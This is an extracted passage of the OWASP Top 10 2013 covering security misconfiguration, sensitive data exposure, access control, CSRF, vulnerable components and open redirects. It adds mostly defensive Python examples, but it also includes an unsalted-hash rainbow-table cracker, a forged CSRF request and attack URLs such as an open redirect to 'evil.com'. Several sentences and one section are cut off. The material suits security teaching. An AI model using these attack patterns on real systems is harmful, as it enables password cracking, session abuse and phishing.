1. A repeatable hardening process that makes it fast and easy to deploy another environment that is properly locked down. Development, QA, and production environments should all be configured identically (with different passwords used in each environment). This process should be automated to minimize the effort required to setup a new secure environment.

2. A process for keeping abreast of and deploying all new software updates and patches in a timely manner to each deployed environment. This needs to include all code libraries as well (see new A9).

3. A strong application architecture that provides effective, secure separation between components.

4. Consider running scans and doing audits periodically to help detect future misconfigurations or missing patches.

Example Attack Scenarios
Scenario #1: The app server admin console is automatically installed and not removed. Default accounts aren't changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over.

Scenario #2: Directory listing is not disabled on your server. Attacker discovers she can simply list directories to find any file. Attacker finds and downloads all your compiled Java classes, which she decompiles and reverse engineers to get all your custom code. She then finds a serious access control flaw in your application.

Scenario #3: App server configuration allows stack traces to be returned to users, potentially exposing underlying flaws. Attackers love the extra information error messages provide.

Scenario #4: App server comes with sample applications that are not removed from your production server. Said sample applications have well known security flaws attackers can use to compromise your server.
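As an added example (not part of the OWASP document), the audit below runs the four scenarios' tell-tale signs over captured HTTP responses: a directory index page, a stack trace in an error body, an admin console or sample application answering on a well-known path, and a Server header that leaks a version. The responses are constructed for the example and the console and sample-app paths are assumptions about common defaults; the point is the checks, which a periodic scan (step 4 above) can apply to real captures.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit


@dataclass
class Response:
    url: str
    status: int
    headers: dict = field(default_factory=dict)
    body: str = ""


# Signatures for the scenarios above. Path lists are assumptions about typical defaults.
DIRECTORY_LISTING = re.compile(r"<title>\s*Index of /", re.I)
STACK_TRACE = re.compile(
    r"(^\s+at [\w$.]+\([\w$]+\.java:\d+\)"      # Java frames
    r"|Traceback \(most recent call last\)"     # Python
    r"|Exception in thread)",
    re.M,
)
VERSION_IN_SERVER = re.compile(r"^[\w-]+/\d")    # e.g. "Apache/2.2.22"
ADMIN_CONSOLE_PATHS = ("/manager/html", "/console", "/admin-console")
SAMPLE_APP_PATHS = ("/examples/", "/docs/", "/sample/")


def audit(responses):
    """Return (url, finding) pairs for every misconfiguration signature seen."""
    findings = []
    for r in responses:
        path = urlsplit(r.url).path
        if r.status == 200 and DIRECTORY_LISTING.search(r.body):
            findings.append((r.url, "directory_listing"))
        if STACK_TRACE.search(r.body):
            findings.append((r.url, "stack_trace"))
        if r.status == 200 and any(path.startswith(p) for p in ADMIN_CONSOLE_PATHS):
            findings.append((r.url, "admin_console"))   # then check default credentials
        if r.status == 200 and any(path.startswith(p) for p in SAMPLE_APP_PATHS):
            findings.append((r.url, "sample_app"))
        if VERSION_IN_SERVER.match(r.headers.get("Server", "")):
            findings.append((r.url, "version_disclosure"))
    return findings


# Constructed captures, one per scenario plus a clean baseline.
SAMPLE_RESPONSES = [
    Response("http://example.com/uploads/", 200, {"Server": "Apache/2.2.22"},
             "<html><head><title>Index of /uploads</title></head><body>..</body></html>"),
    Response("http://example.com/app/order?id=x", 500, {},
             "java.lang.NullPointerException\n\tat com.example.OrderServlet.doGet(OrderServlet.java:42)\n"),
    Response("http://example.com/manager/html", 200, {}, "<title>Web Application Manager</title>"),
    Response("http://example.com/examples/", 200, {}, "<title>Examples</title>"),
    Response("http://example.com/", 200, {"Server": "Apache"}, "<html>ok</html>"),
]


if __name__ == "__main__":
    for url, finding in audit(SAMPLE_RESPONSES):
        print(f"{finding:20} {url}")
```

The version check is a disclosure finding rather than a vulnerability by itself; it matters because it lets an attacker go straight to the known flaws of that release (see A9).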

References
OWASP
OWASP Development Guide: Chapter on Configuration (https://www.owasp.org/index.php/Configuration)
OWASP Code Review Guide: Chapter on Error Handling (https://www.owasp.org/index.php/Error_Handling)
OWASP Testing Guide: Configuration Management (https://www.owasp.org/index.php/Testing_for_configuration_management)
OWASP Testing Guide: Testing for Error Codes (https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006))
OWASP Top 10 2004 - Insecure Configuration Management (https://www.owasp.org/index.php/A10_2004_Insecure_Configuration_Management)
For additional requirements in this area, see the ASVS requirements area for Security Configuration (V12) (https://www.owasp.org/index.php/ASVS).

External
PC Magazine Article on Web Server Hardening (http://www.pcmag.com/article2/0,2817,11525,00.asp)
CWE Entry 2 on Environmental Security Flaws (http://cwe.mitre.org/data/definitions/2.html)
CIS Security Configuration Guides/Benchmarks (http://benchmarks.cisecurity.org/downloads/benchmarks/)

A6 Sensitive Data Exposure

Threat Agents: Application Specific
Attack Vectors: Exploitability DIFFICULT
Security Weakness: Prevalence UNCOMMON; Detectability AVERAGE
Technical Impacts: Impact SEVERE
Business Impacts: Application / Business Specific

Threat Agents: Consider who can gain access to your sensitive data and any backups of that data. This includes the data at rest, in transit, and even in your customers' browsers. Include both external and internal threats.

Attack Vectors: Attackers typically don't break crypto directly. They break something else, such as steal keys, do man-in-the-middle attacks, or steal clear text data off the server, while in transit, or from the user's browser.

Security Weakness: The most common flaw is simply not encrypting sensitive data. When crypto is employed, weak key generation and management, and weak algorithm usage is common, particularly weak password hashing techniques. Browser weaknesses are very common and easy to detect, but hard to exploit on a large scale. External attackers have difficulty detecting server side flaws due to limited access and they are also usually hard to exploit.

Technical Impacts: Failure frequently compromises all data that should have been protected. Typically, this information includes sensitive data such as health records, credentials, personal data, credit cards, etc.

Business Impacts: Consider the business value of the lost data and impact to your reputation. What is your legal liability if this data is exposed? Also consider the damage to your reputation.

Am I Vulnerable to Data Exposure?
The first thing you have to determine is which data is sensitive enough to require extra protection. For example, passwords, credit card numbers, health records, and personal information should be protected. For all such data:

1. Is any of this data stored in clear text long term, including backups of this data?

2. Is any of this data transmitted in clear text, internally or externally? Internet traffic is

3. Are any old / weak cryptographic algorithms used?

4. Are weak crypto keys generated, or is proper key management or rotation missing?

5. Are any browser security directives or headers missing when sensitive data is provided by / sent to the browser?

And more ... For a more complete set of problems to avoid, see ASVS areas Crypto (V7), Data Prot. (V9), and SSL (V10).

How Do I Prevent This?
The full perils of unsafe cryptography, SSL usage, and data protection are well beyond the scope of the Top 10. That said, for all sensitive data, do all of the following, at a minimum:

1. Considering the threats you plan to protect this data from (e.g., insider attack, external user), make sure you encrypt all sensitive data at rest and in transit in a manner that defends against these threats.

2. Don't store sensitive data unnecessarily. Discard it as soon as possible. Data you

3. Ensure strong standard algorithms are used, and proper key management is in place. Consider using FIPS 140 validated cryptographic modules (http://csrc.nist.gov/groups/STM/cmvp/documents/140-1/140val-all.htm).

4. Ensure passwords are stored with an algorithm specifically designed for password protection, such as bcrypt (http://en.wikipedia.org/wiki/Bcrypt), PBKDF2 (http://en.wikipedia.org/wiki/PBKDF2), or scrypt (http://en.wikipedia.org/wiki/Scrypt).

5. Disable autocomplete on forms collecting sensitive data and disable caching for pages that contain sensitive data.

Example Attack Scenarios
Scenario #1: An application encrypts credit card numbers in a database using automatic database encryption. However, this means it also decrypts this data automatically when retrieved, allowing a SQL injection flaw to retrieve credit card numbers in clear text. The system should have encrypted the credit card numbers using a public key, and only allowed back-end applications to decrypt them with the private key.

Scenario #2: A site simply doesn't use SSL for all authenticated pages. Attacker simply monitors network traffic (like an open wireless network), and steals the user's session cookie. Attacker then replays this cookie and hijacks the user's session, accessing the user's private data.

Scenario #3: The password database uses unsalted hashes to store everyone's passwords. A file upload flaw allows an attacker to retrieve the password file. All of the unsalted hashes can be exposed with a rainbow table of precalculated hashes.
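Step 4 of the prevention list and Scenario #3 together, as an added example that is not part of the OWASP document: salted, iterated PBKDF2 (available in the Python standard library; bcrypt and scrypt are equally valid choices) beside the unsalted hashing the scenario describes, with a precomputed table to show why the unsalted variant falls immediately. The storage format, the iteration count and the sample word list are assumptions made for the example.

```python
import base64
import hashlib
import hmac
import os

PBKDF2_ITERATIONS = 600_000  # assumption: tune so one hash costs well over 100 ms on your servers


def _b64(raw: bytes) -> str:
    return base64.b64encode(raw).decode("ascii")


def hash_password(password: str, iterations: int = PBKDF2_ITERATIONS) -> str:
    """Per-password random salt plus PBKDF2-HMAC-SHA256. The record is
    self-describing, so the iteration count can be raised later without
    invalidating existing hashes."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${_b64(salt)}${_b64(dk)}"


def verify_password(password: str, stored: str) -> bool:
    algo, iterations, salt_b64, dk_b64 = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(dk_b64)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    return hmac.compare_digest(dk, expected)  # constant-time comparison


# --- Scenario #3: what an unsalted password database looks like to an attacker ---

def unsalted_sha1(password: str) -> str:
    """The scenario's flaw: no salt, one fast hash (do not copy this)."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def build_rainbow_table(wordlist) -> dict:
    """Precomputed hash -> password. One table works against every user in
    the leaked file because identical passwords produce identical hashes."""
    return {unsalted_sha1(word): word for word in wordlist}


def crack_unsalted(leaked_hashes, table) -> dict:
    """Pure lookup; no hashing is needed at attack time."""
    return {h: table[h] for h in leaked_hashes if h in table}


if __name__ == "__main__":
    record = hash_password("correct horse battery staple")
    print(record)
    print(verify_password("correct horse battery staple", record))
```

Because every salted record uses its own salt, a table would have to be rebuilt per user at the full PBKDF2 cost, which is precisely the work factor the algorithm is designed to impose.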

References
OWASP
For a more complete set of requirements, see ASVS req'ts on Cryptography (V7), Data Protection (V9) and Communications Security (V10) (https://www.owasp.org/index.php/ASVS)
OWASP Cryptographic Storage Cheat Sheet (https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet)
OWASP Password Storage Cheat Sheet (https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet)
OWASP Transport Layer Protection Cheat Sheet (https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet)
OWASP Testing Guide: Chapter on SSL/TLS Testing (https://www.owasp.org/index.php/Testing_for_SSL-TLS)

External
CWE Entry 310 on Cryptographic Issues (http://cwe.mitre.org/data/definitions/310.html)
CWE Entry 312 on Cleartext Storage of Sensitive Information (http://cwe.mitre.org/data/definitions/312.html)
CWE Entry 319 on Cleartext Transmission of Sensitive Information (http://cwe.mitre.org/data/definitions/319.html)
CWE Entry 326 on Weak Encryption (http://cwe.mitre.org/data/definitions/326.html)

A7 Missing Function Level Access Control

Threat Agents: Application Specific
Attack Vectors: Exploitability EASY
Security Weakness: Prevalence COMMON; Detectability AVERAGE
Technical Impacts: Impact MODERATE
Business Impacts: Application / Business Specific

Threat Agents: Anyone with network access can send your application a request. Could anonymous users access private functionality or regular users a privileged function?

Attack Vectors: Attacker, who is an authorized system user, simply changes the URL or a parameter to a privileged function. Is access granted? Anonymous users could access private functions that aren't protected.

Security Weakness: Applications do not always protect application functions properly. Sometimes, function level protection is managed via configuration, and the system is misconfigured. Sometimes, developers must include the proper code checks, and they forget. Detecting such flaws is easy. The hardest part is identifying which pages (URLs) or functions exist to attack.

Technical Impacts: Such flaws allow attackers to access unauthorized functionality. Administrative functions are key targets for this type of attack.

Business Impacts: Consider the business value of the exposed functions and the data they process. Also consider the impact to your reputation if this vulnerability became public.

Am I Vulnerable to Forced Access?
The best way to find out if an application has failed to properly restrict function level access is to verify every application function:

1. Does the UI show navigation to unauthorized functions?

2. Are server side authentication or authorization checks missing?

3. Are server side checks done that solely rely on information provided by the attacker?

Using a proxy, browse your application with a privileged role. Then revisit restricted pages using a less privileged role. If the server responses are alike, you're probably vulnerable. Some testing proxies directly support this type of analysis.

You can also check the access control implementation in the code. Try following a single privileged request through the code and verifying the authorization pattern. Then search the codebase to find where that pattern is not being followed.

Automated tools are unlikely to find these problems.

How Do I Prevent Forced Access?
Your application should have a consistent and easy to analyze authorization module that is invoked from all of your business functions. Frequently, such protection is provided by one or more components external to the application.

1. Think about the process for managing entitlements and

2. Deny all access by default, requiring explicit grants to specific roles for access to every function.

3. If the function is involved in a workflow, check to make sure the conditions are in the proper state to allow access.

NOTE: Most web applications don't display links and buttons to unauthorized functions, but this "presentation layer access control" doesn't actually provide protection. You must also implement checks in the controller or business logic.

Example Attack Scenarios
Scenario #1: The attacker simply force browses to target URLs. The following URLs require authentication. Admin rights are also required for access to the admin_getappInfo page.

http://example.com/app/getappInfo
http://example.com/app/admin_getappInfo

If an unauthenticated user can access either page, that's a flaw. If an authenticated, non-admin, user is allowed to access the admin_getappInfo page, this is also a flaw, and may lead the attacker to more improperly protected admin pages.

Scenario #2: A page provides an 'action' parameter to specify the function being invoked, and different actions require different roles. If these roles aren't enforced, that's a flaw.
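An added example (not OWASP code) of the deny-by-default authorization module the prevention steps call for, covering both scenarios: the two URLs from Scenario #1 and a per-action role check for Scenario #2, plus the proxy-style comparison from "Am I Vulnerable", which replays each privileged response as a lower-privileged user and reports URLs whose response is identical. The users, roles, handler bodies, the /app/users and /app/admin_export routes and the deliberately over-granted export route are assumptions constructed for the example; only the two getappInfo URLs come from the page.

```python
# Constructed users and their roles (in a real application this comes from the session).
USERS = {"alice": {"user"}, "carol": {"user", "admin"}}


class NotFound(Exception):
    pass


class Unauthenticated(Exception):
    pass


class Forbidden(Exception):
    pass


ROUTES = {}  # url -> (handler, roles explicitly granted)


def route(url, roles):
    """Register a function together with its explicit grant. Nothing reachable
    through dispatch() exists without one: that is the deny-by-default rule."""
    def register(fn):
        ROUTES[url] = (fn, frozenset(roles))
        return fn
    return register


def dispatch(url, user=None, **params):
    """The single authorization module every function goes through. The role
    comes from the server-side session, never from a request parameter."""
    if url not in ROUTES:
        raise NotFound(url)
    handler, granted = ROUTES[url]
    if user is None:
        raise Unauthenticated(url)
    if not granted & USERS.get(user, set()):
        raise Forbidden(url)
    return handler(user, **params)


@route("/app/getappInfo", roles={"user", "admin"})
def getapp_info(user):
    return {"app": "demo", "user": user}


@route("/app/admin_getappInfo", roles={"admin"})
def admin_getapp_info(user):
    return {"app": "demo", "config": "db=prod;debug=off"}


# Scenario #2: one URL, several actions, each with its own required roles.
ACTION_ROLES = {"view": {"user", "admin"}, "deleteUser": {"admin"}}


@route("/app/users", roles={"user", "admin"})
def users_action(user, action):
    needed = ACTION_ROLES.get(action)
    if needed is None:
        raise NotFound(action)
    if not needed & USERS[user]:
        raise Forbidden(action)   # URL-level grant is not enough here
    return f"{action} performed by {user}"


# Misconfigured on purpose: an admin-only export granted to every user.
@route("/app/admin_export", roles={"user", "admin"})
def admin_export(user):
    return "all user records"


def forced_browse_check(urls, privileged, unprivileged):
    """Proxy test from 'Am I Vulnerable': URLs that answer a less privileged
    user with exactly the privileged user's response are probably unprotected."""
    leaky = []
    for url in urls:
        try:
            high = dispatch(url, privileged)
            low = dispatch(url, unprivileged)
        except (Forbidden, Unauthenticated, NotFound):
            continue
        if high == low:
            leaky.append(url)
    return leaky


if __name__ == "__main__":
    print(forced_browse_check(["/app/admin_getappInfo", "/app/admin_export"], "carol", "alice"))
```

The comparison is a heuristic: a page legitimately shared by both roles that renders identically would also be flagged, so it is applied to the URLs that are supposed to be restricted.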

References
OWASP
OWASP Top 10-2007 on Failure to Restrict URL Access (https://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access)
ESAPI Access Control API (http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessController.html)
OWASP Development Guide: Chapter on Authorization (https://www.owasp.org/index.php/Guide_to_Authorization)
OWASP Testing Guide: Testing for Path Traversal (https://www.owasp.org/index.php/Testing_for_Path_Traversal)
OWASP Article on Forced Browsing (https://www.owasp.org/index.php/Forced_browsing)
For additional access control requirements, see the ASVS requirements area for Access Control (V4) (https://www.owasp.org/index.php/ASVS).

External
CWE Entry 285 on Improper Access Control (Authorization) (http://cwe.mitre.org/data/definitions/285.html)

A8 Cross-Site Request Forgery (CSRF)

If the victim visits any of the attacker's sites while already authenticated to example.com, these forged requests will automatically include the user's session info, authorizing the attacker's request.
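The defence against the forged request described above, as an added example that is not part of the OWASP document or of CSRFGuard/ESAPI: a synchronizer token bound to the session with an HMAC, checked by a state-changing handler that is otherwise authenticated only by the session cookie the browser attaches automatically. The server key, session table, form fields and handler are assumptions constructed for the example.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)   # assumption: one secret per deployment, never sent to clients
SESSIONS = {"sess-alice": "alice"}     # constructed: session id -> logged-in user


def issue_csrf_token(session_id: str) -> str:
    """Synchronizer token bound to the session: a fresh nonce plus an HMAC over
    session id and nonce, so a token minted for one session fails for another."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(SERVER_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def transfer_handler(request: dict) -> tuple:
    """State-changing POST. The cookie alone proves nothing about who built the
    request, because the browser attaches it to the attacker's form as well."""
    session_id = request.get("cookies", {}).get("session")
    user = SESSIONS.get(session_id)
    if user is None:
        return 401, "login required"
    form = request.get("form", {})
    # The token must come from the form body, which a cross-site page cannot read.
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return 403, "missing or invalid CSRF token"
    return 200, f"{user} transferred {form['amount']} to {form['dest']}"


def forged_request() -> dict:
    """What the attacker's page makes the victim's browser send: cookie present, no token."""
    return {"cookies": {"session": "sess-alice"},
            "form": {"amount": "1500", "dest": "attackersAcct"}}


def legitimate_request() -> dict:
    """A form rendered by the site itself carries a token for the user's own session."""
    form = {"amount": "25", "dest": "savings", "csrf_token": issue_csrf_token("sess-alice")}
    return {"cookies": {"session": "sess-alice"}, "form": form}


if __name__ == "__main__":
    print(transfer_handler(forged_request()))
    print(transfer_handler(legitimate_request()))
```

The token is only a defence while it stays out of the attacker's reach: as the XSS section notes, a script running in the site's origin can read it from the page, so this control depends on A3 being handled too.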

References
OWASP
OWASP CSRF Article
OWASP CSRF Prevention Cheat Sheet (https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet)
OWASP CSRFGuard - CSRF Defense Tool (https://www.owasp.org/index.php/CSRFGuard)
ESAPI Project Home Page (https://www.owasp.org/index.php/ESAPI)
ESAPI HTTPUtilities Class with AntiCSRF Tokens (http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/HTTPUtilities.html)
OWASP Testing Guide: Chapter on CSRF Testing (https://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005))
OWASP CSRFTester - CSRF Testing Tool (https://www.owasp.org/index.php/CSRFTester)

External
CWE Entry 352 on CSRF (http://cwe.mitre.org/data/definitions/352.html)
  • 8/11/2019 (251289837) OWASP Top 10 - 2013.doc

    26/39

A9 Using Components with Known Vulnerabilities

Threat Agents | Attack Vectors | Security Weakness | Technical Impacts | Business Impacts

Threat Agents (Application Specific): Some vulnerable components (e.g., framework libraries) can be identified and exploited with automated tools, expanding the threat agent pool beyond targeted attackers to include chaotic actors.

Attack Vectors (Exploitability AVERAGE): Attacker identifies a weak component through scanning or manual analysis. He customizes the exploit as needed and executes the attack. It gets more difficult if the used component is deep in the application.

Security Weakness (Prevalence WIDESPREAD, Detectability DIFFICULT): Virtually every application has these issues because most development teams don't focus on ensuring their components/libraries are up to date. In many cases, the developers don't even know all the components they are using, never mind their versions. Component dependencies make things even worse.

Technical Impacts (Impact MODERATE): The full range of weaknesses is possible, including injection, broken access control, XSS, etc. The impact could range from minimal to complete host takeover and data compromise.

Business Impacts (Application / Business Specific): Consider what each vulnerability might mean for the business controlled by the affected application. It could be trivial or it could mean complete compromise.

Am I Vulnerable to Known Vulns?

In theory, it ought to be easy to figure out if you are currently using any vulnerable components or libraries. Unfortunately, vulnerability reports for commercial or open source software do not always specify exactly which versions of a component are vulnerable in a standard, searchable way. Further, not all libraries use an understandable version numbering system. Worst of all, not all vulnerabilities are reported to a central clearinghouse that is easy to search, although sites like CVE and NVD are becoming easier to search.

Determining if you are vulnerable requires searching these databases, as well as keeping abreast of project mailing lists and announcements for anything that might be a vulnerability. If one of your components does have a vulnerability, you should carefully evaluate whether you are actually vulnerable by checking to see if your code uses the part of the component with the vulnerability and whether the flaw could result in an impact you care about.

How Do I Prevent This?

One option is not to use components that you didn't write. But that's not very realistic.

Most component projects do not create vulnerability patches for old versions. Instead, most simply fix the problem in the next version. So upgrading to these new versions is critical. Software projects should have a process in place to:

1) Identify all components and the versions you are using, including all dependencies (e.g., the versions plugin).

2) Monitor the security of these components in public databases, project mailing lists, and security mailing lists, and keep them up to date.

3) Establish security policies governing component use, such as requiring certain software development practices, passing security tests, and acceptable licenses.

4) Where appropriate, consider adding security wrappers around components to disable unused functionality and/or secure weak or vulnerable aspects of the component.
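Prevention steps 1 and 2 worked through as an added example (this is not OWASP Dependency Check's code): an inventory that includes transitive dependencies is checked against advisories giving an affected version range, and a component whose version scheme cannot be ordered is sent to manual review instead of silently passing. The inventory, the advisories and their identifiers are constructed sample data.

```python
"""Audit a component inventory (direct and transitive dependencies) against
advisories that state an affected version range.

Added example for prevention steps 1 and 2, not OWASP Dependency Check's
code. The inventory, the advisories and their identifiers are constructed."""
import re
from typing import NamedTuple, Optional

class Component(NamedTuple):
    name: str
    version: str
    via: str           # "direct", or the parent that pulled it in

class Advisory(NamedTuple):
    component: str
    advisory_id: str   # placeholder id, constructed
    min_affected: str  # inclusive lower bound
    fixed_in: str      # exclusive upper bound; "" = no fix published

_NUMERIC = re.compile(r"^\d+(\.\d+)*$")

def parse_version(v: str) -> Optional[tuple]:
    """Dotted numeric versions become comparable tuples; anything else
    (dates, 'SNAPSHOT', vendor schemes) returns None so it is not
    silently treated as safe."""
    if not _NUMERIC.match(v):
        return None
    return tuple(int(p) for p in v.split("."))

def _cmp(a: tuple, b: tuple) -> int:
    """Compare tuples padded to equal length, so 1.2 == 1.2.0."""
    n = max(len(a), len(b))
    a, b = a + (0,) * (n - len(a)), b + (0,) * (n - len(b))
    return (a > b) - (a < b)

def is_affected(version: str, adv: Advisory) -> Optional[bool]:
    """True/False when the range can be evaluated, None when it cannot."""
    v, lo = parse_version(version), parse_version(adv.min_affected)
    if v is None or lo is None:
        return None
    if _cmp(v, lo) < 0:
        return False
    hi = parse_version(adv.fixed_in) if adv.fixed_in else None
    return hi is None or _cmp(v, hi) < 0

def audit(inventory, advisories):
    """Return (affected, needs_review): affected maps a component name to
    the advisory ids covering its version; needs_review lists components
    whose version string could not be ordered."""
    affected, needs_review = {}, []
    for comp in inventory:
        for adv in (a for a in advisories if a.component == comp.name):
            hit = is_affected(comp.version, adv)
            if hit is None and comp.name not in needs_review:
                needs_review.append(comp.name)
            elif hit:
                affected.setdefault(comp.name, []).append(adv.advisory_id)
    return affected, needs_review

# Constructed inventory: two direct dependencies and what they pull in.
INVENTORY = [
    Component("webframework", "2.5.6", "direct"),
    Component("services-lib", "2.4.3", "direct"),
    Component("el-impl", "1.0", "webframework"),
    Component("xml-parser", "2013-SNAPSHOT", "services-lib"),
]
# Constructed advisories; the ids are placeholders, not real CVE numbers.
ADVISORIES = [
    Advisory("el-impl", "ADV-PLACEHOLDER-1", "1.0", "1.1"),
    Advisory("services-lib", "ADV-PLACEHOLDER-2", "2.4.0", "2.4.4"),
    Advisory("webframework", "ADV-PLACEHOLDER-3", "2.5.0", "2.5.6"),
    Advisory("xml-parser", "ADV-PLACEHOLDER-4", "1.0", ""),
]

if __name__ == "__main__":
    found, review = audit(INVENTORY, ADVISORIES)
    for comp in INVENTORY:
        if comp.name in found:
            print(f"{comp.name} {comp.version} (via {comp.via}): {found[comp.name]}")
    print("needs manual review:", review)
```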

Example Attack Scenarios

Component vulnerabilities can cause almost any type of risk imaginable, ranging from the trivial to sophisticated malware designed to target a specific organization. Components almost always run with the full privilege of the application, so flaws in any component can be serious. The following two vulnerable components were downloaded 22m times in 2011.

Apache CXF Authentication Bypass: By failing to provide an identity token, attackers could invoke any web service with full permission. (Apache CXF is a services framework, not to be confused with the Apache Application Server.)

Spring Remote Code Execution: Abuse of the Expression Language implementation in Spring allowed attackers to execute arbitrary code, effectively taking over the server.


Every application using either of these vulnerable libraries is vulnerable to attack as both of these components are directly accessible by application users. Other vulnerable libraries, used deeper in an application, may be harder to exploit.

References

OWASP
OWASP Dependency Check (for Java libraries)
OWASP SafeNuGet


A10 Unvalidated Redirects and Forwards

How Do I Prevent This?

Safe use of redirects and forwards can be done in a number of ways:

1) Simply avoid using redirects and forwards.

2) If used, don't involve user parameters in calculating the destination. This can usually be done.

3) If destination parameters can't be avoided, ensure that the supplied value is valid, and authorized for the user.

It is recommended that any such destination parameters be a mapping value, rather than the actual URL or portion of the URL, and that server side code translate this mapping to the target URL.

Applications can use ESAPI to override the sendRedirect() method to make sure all redirect destinations are safe.

Avoiding such flaws is extremely important as they are a favorite target of phishers trying to gain the user's trust.
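Step 3 and the mapping-value recommendation as an added example (not ESAPI's or any framework's API): the client supplies a key, the server translates it to a target it chose and re-checks that the user is authorized for that target. The route table, the role names and the is_local_path helper for an endpoint that must still accept a path are assumptions.

```python
"""Safe redirect/forward resolution: the client supplies a mapping key,
the server chooses the target and re-checks authorization.

Added example for the A10 prevention steps; the route table, role names
and the legacy-path helper are assumptions, not ESAPI or a framework API."""
from urllib.parse import urlsplit

# Constructed route table: mapping key -> (server-chosen target, roles allowed).
ROUTES = {
    "home":    ("/index.jsp",   {"user", "admin"}),
    "account": ("/account.jsp", {"user", "admin"}),
    "admin":   ("/admin.jsp",   {"admin"}),
}
DEFAULT_TARGET = "/index.jsp"   # where unknown or unauthorized keys land

def resolve_destination(key: str, user_roles) -> str:
    """Translate a mapping value to a target URL. A raw URL such as
    'evil.com' is never a key, so it can only fall back to the default;
    a key the user is not authorized for (scenario #2: 'admin' for a
    plain user) falls back as well instead of being forwarded."""
    entry = ROUTES.get(key)
    if entry is None:
        return DEFAULT_TARGET
    target, allowed = entry
    if not set(user_roles) & allowed:
        return DEFAULT_TARGET
    return target

def is_local_path(value: str) -> bool:
    """For an endpoint that still has to accept a path instead of a key:
    allow only a relative path on this site. Rejects absolute URLs,
    protocol-relative '//evil.com', and backslash variants that some
    browsers normalize to '/'."""
    if not value.startswith("/") or value.startswith("//") or "\\" in value:
        return False
    parts = urlsplit(value)
    return parts.scheme == "" and parts.netloc == ""

if __name__ == "__main__":
    # Scenario #1 hardened: ?url=evil.com is not a mapping key.
    print(resolve_destination("evil.com", {"user"}))      # /index.jsp
    # Scenario #2 hardened: ?fwd=admin is re-authorized on the server.
    print(resolve_destination("admin", {"user"}))         # /index.jsp
    print(resolve_destination("admin", {"admin"}))        # /admin.jsp
    print(is_local_path("//evil.com"), is_local_path("/account.jsp"))  # False True
```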

Example Attack Scenarios

Scenario #1: The application has a page called "redirect.jsp" which takes a single parameter named "url". The attacker crafts a malicious URL that redirects users to a malicious site that performs phishing and installs malware.

http://www.example.com/redirect.jsp?url=evil.com

Scenario #2: The application uses forwards to route requests between different parts of the site. To facilitate this, some pages use a parameter to indicate where the user should be sent if a transaction is successful. In this case, the attacker crafts a URL that will pass the application's access control check and then forwards the attacker to administrative functionality for which the attacker isn't authorized.

http://www.example.com/boring.jsp?fwd=admin.jsp

References

OWASP
OWASP Article on Open Redirects
ESAPI SecurityWrapperResponse sendRedirect() method

External
CWE Entry 601 on Open Redirects
WASC Article on URL Redirector Abuse
Google blog article on the dangers of open redirects
OWASP Top 10 for .NET article on Unvalidated Redirects and Forwards


+D What's Next for Developers

Establish & Use Repeatable Security Processes and Standard Security Controls

Whether you are new to web application security or are already very familiar with these risks, the task of producing a secure web application or fixing an existing one can be difficult. If you have to manage a large application portfolio, this can be daunting.

To help organizations and developers reduce their application security risks in a cost effective manner, OWASP has produced numerous free and open resources that you can use to address application security in your organization. The following are some of the many resources OWASP has produced to help organizations produce secure web applications. On the next page, we present additional OWASP resources that can assist organizations in verifying the security of their applications.

(Table of developer resources: only its first row label, "Application Security Re...", survived extraction.)


There are numerous additional OWASP resources available for your use. Please visit the OWASP Projects page, which lists all of the OWASP projects, organized by the release quality of the projects in question (Release Quality, Beta, or Alpha). Most OWASP resources are available on our wiki, and many OWASP documents can be ordered in hard copy or as eBooks.


+V What's Next for Verifiers

Get Organized

To verify the security of a web application you have developed, or one you are considering purchasing, OWASP recommends that you review the application's code (if available), and test the application as well. OWASP recommends a combination of secure code review and application penetration testing whenever possible, as that allows you to leverage the strengths of both techniques, and the two approaches complement each other. Tools for assisting the verification process can improve the efficiency and effectiveness of an expert analyst. OWASP's assessment tools are focused on helping an expert become more effective, rather than trying to automate the analysis process itself.

Standardizing How You Verify Web Application Security: To help organizations develop consistency and a defined level of rigor when assessing the security of web applications, OWASP has produced the OWASP Application Security Verification Standard (ASVS). This document defines a minimum verification standard for performing web application security assessments. OWASP recommends that you use the ASVS as guidance for not only what to look for when verifying the security of a web application, but also which techniques are most appropriate to use, and to help you define and select a level of rigor when verifying the security of a web application. OWASP also recommends you use the ASVS to help define and select any web application assessment services you might procure from a third party provider.

Assessment Tools Suite: The OWASP Live CD Project has pulled together some of the best open source security tools into a single bootable environment or virtual machine (VM). Web developers, testers, and security professionals can boot from this Live CD, or run the VM, and immediately have access to a full security testing suite. No installation or configuration is required to use the tools provided on this CD.

Code Review

Secure code review is particularly suited to verifying that an application contains strong security mechanisms as well as finding issues that are hard to identify by examining the application's output. Testing is particularly suited to proving that flaws are actually exploitable. That said, the approaches are complementary and in fact overlap in some areas.

Reviewing the Code: As a companion to the OWASP Developer's


Security and Penetration Testing

